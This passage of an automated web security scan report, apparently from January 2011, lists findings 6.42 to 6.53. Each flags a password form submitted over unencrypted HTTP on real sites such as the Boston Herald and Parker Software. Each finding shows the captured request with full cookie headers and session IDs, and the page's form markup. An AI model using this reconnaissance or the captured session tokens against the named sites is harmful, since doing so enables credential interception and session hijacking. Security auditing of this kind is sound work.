Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.42. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password fields:

Request

GET /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:43:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.43. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password fields:

Request

GET /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.44. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password fields:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.45. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password fields:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.46. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password fields:

Request

GET /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.47. http://www.bostonherald.com/users/register

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password fields:

Request

GET /users/register HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

6.48. http://www.bostonherald.com/users/register/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password fields:

Request

GET /users/register/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

6.49. http://www.paperg.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:42 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 10755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

6.50. http://www.parker-software.com/forum/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.parker-software.com
Path:   /forum/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP. The form contains the following password field:

Request

GET /forum/ HTTP/1.1
Host: www.parker-software.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 21920
Content-Type: text/html
Expires: Wed, 26 Jan 2011 13:58:10 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D01%2D28+13%3A58%3A10; expires=Sat, 28-Jan-2012 13:58:10 GMT; path=/forum/
Set-Cookie: WWF9sID=SID=629255141c2dfczb44f2d1ea4be92fz9; path=/forum/
Set-Cookie: ASPSESSIONIDCQSCRASQ=CIEMDCNAFMCFHFEFAKMMMFLF; path=/
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<td align="right" class="smText">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp">Quick Login
<input type="text" size="10" name="name" id="name" style="font-size: 10px;" tabindex="1" />
<input type="password" size="10" name="password" id="password" style="font-size: 10px;" tabindex="2" />
<input type="hidden" name="NS" id="NS" value="1" />
...[SNIP]...

6.51. http://www.parkersoft.co.uk/client.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /client.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /client.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Proxy-Connection: keep-alive
Referer: http://www.whoson.com/installable.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45; path=/; HttpOnly
Set-Cookie: whoson=530-50268.8034574; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/
Date: Fri, 28 Jan 2011 13:57:48 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="client.aspx" id="aspnetForm">
<div>
...[SNIP]...
<br />
<input name="ctl00$ContentMain$txtPassword" type="password" maxlength="100" id="ctl00_ContentMain_txtPassword" style="width:200px;" />&nbsp;&nbsp;
<input type="button" name="ctl00$ContentMain$btnLogin" value="Login" onclick="javascript:__doPostBack('ctl00$ContentMain$btnLogin','')" id="ctl00_ContentMain_btnLogin" />
...[SNIP]...

6.52. http://www.screenthumbs.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:52:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=03c0e7391c4e0c2e4a05965642293dcb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a; path=/
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="882dc39daf895399d7dadcc1e174dbe0" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

6.53. http://www.screenthumbs.com/about

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /about

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /about HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="ce27f33fe20b797949d1207d44f9639d" />
...[SNIP]...
